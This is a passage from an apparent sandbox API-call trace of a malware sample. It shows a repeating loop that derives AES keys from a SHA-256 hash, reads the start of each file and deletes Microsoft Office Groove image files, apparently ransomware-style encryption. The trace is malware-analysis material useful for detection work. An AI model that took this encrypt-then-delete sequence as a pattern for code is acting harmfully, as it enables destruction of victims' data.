dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.016] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.016] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.016] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.016] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x838 [0163.016] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.018] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0163.019] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.019] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.020] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\MessageAttachmentIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\messageattachmenticonimagesmask.bmp")) returned 1 [0163.021] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.022] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.022] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.022] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.022] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x22f6 [0163.022] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.041] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.041] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.041] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.042] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\MessageHistoryIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\messagehistoryiconimages.jpg")) returned 1 [0163.044] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.045] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.045] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.045] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.045] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x140 [0163.045] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.048] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0163.048] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.048] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.050] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\MessageHistoryIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\messagehistoryiconimagesmask.bmp")) returned 1 [0163.052] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.052] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.052] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.053] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.053] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3efd [0163.053] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.117] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.117] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.117] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.118] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierBackground.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierbackground.jpg")) returned 1 [0163.120] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.120] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.120] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.120] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.120] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x40aa [0163.120] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.124] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0163.124] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.124] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.125] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierBackgroundRTL.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierbackgroundrtl.jpg")) returned 1 [0163.128] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.129] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.129] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.129] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.129] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2f2 [0163.129] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.144] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.144] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.145] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.146] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierCloseButton.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierclosebutton.jpg")) returned 1 [0163.147] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.147] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.147] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.147] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.148] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2cc [0163.148] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.160] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0163.160] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.160] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.162] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierDisableDownArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierdisabledownarrow.jpg")) returned 1 [0163.163] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.163] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.163] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.163] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.163] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x307 [0163.164] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.185] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.185] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.185] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.187] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierDisableUpArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierdisableuparrow.jpg")) returned 1 [0163.188] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.188] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.188] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.188] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.188] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x368 [0163.188] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.191] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0163.191] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.191] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.192] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierDownArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierdownarrow.jpg")) returned 1 [0163.193] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.194] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.194] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.194] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.194] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c0 [0163.194] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.207] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.207] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.207] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.209] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierUpArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifieruparrow.jpg")) returned 1 [0163.210] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.211] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.211] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.211] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.211] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x133a [0163.211] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.232] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0163.232] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.232] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.233] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierWindowMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierwindowmask.bmp")) returned 1 [0163.235] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.235] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.235] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.235] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.235] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x133a [0163.235] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.244] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.244] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.244] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.245] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierWindowMaskRTL.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierwindowmaskrtl.bmp")) returned 1 [0163.246] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.247] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.247] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.247] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.247] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1e35 [0163.247] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.252] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0163.252] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.252] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.253] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\OutlineToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\outlinetooliconimages.jpg")) returned 1 [0163.254] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.254] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.254] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.254] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.254] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1938 [0163.255] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.267] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.267] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.267] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.268] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\OutlineToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\outlinetooliconimagesmask.bmp")) returned 1 [0163.270] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.270] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.271] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.271] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.271] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf8d [0163.271] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.278] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0163.278] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.278] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.279] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\OutofSyncIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\outofsynciconimages.jpg")) returned 1 [0163.280] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.281] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.281] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.281] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.281] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc0 [0163.281] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.282] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.282] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.282] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.284] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\OutofSyncIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\outofsynciconimagesmask.bmp")) returned 1 [0163.285] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.286] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.286] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.286] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.286] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5203 [0163.286] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.294] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0163.294] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.294] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.296] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\PicturesToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\picturestooliconimages.jpg")) returned 1 [0163.298] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.298] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.298] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.298] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0163.298] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1238 [0163.298] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0163.319] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0163.319] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0163.319] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0163.320] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\PicturesToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\picturestooliconimagesmask.bmp")) returned 1 [0163.322] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0163.322] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0163.322] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.322] CryptDeriveKey (in: 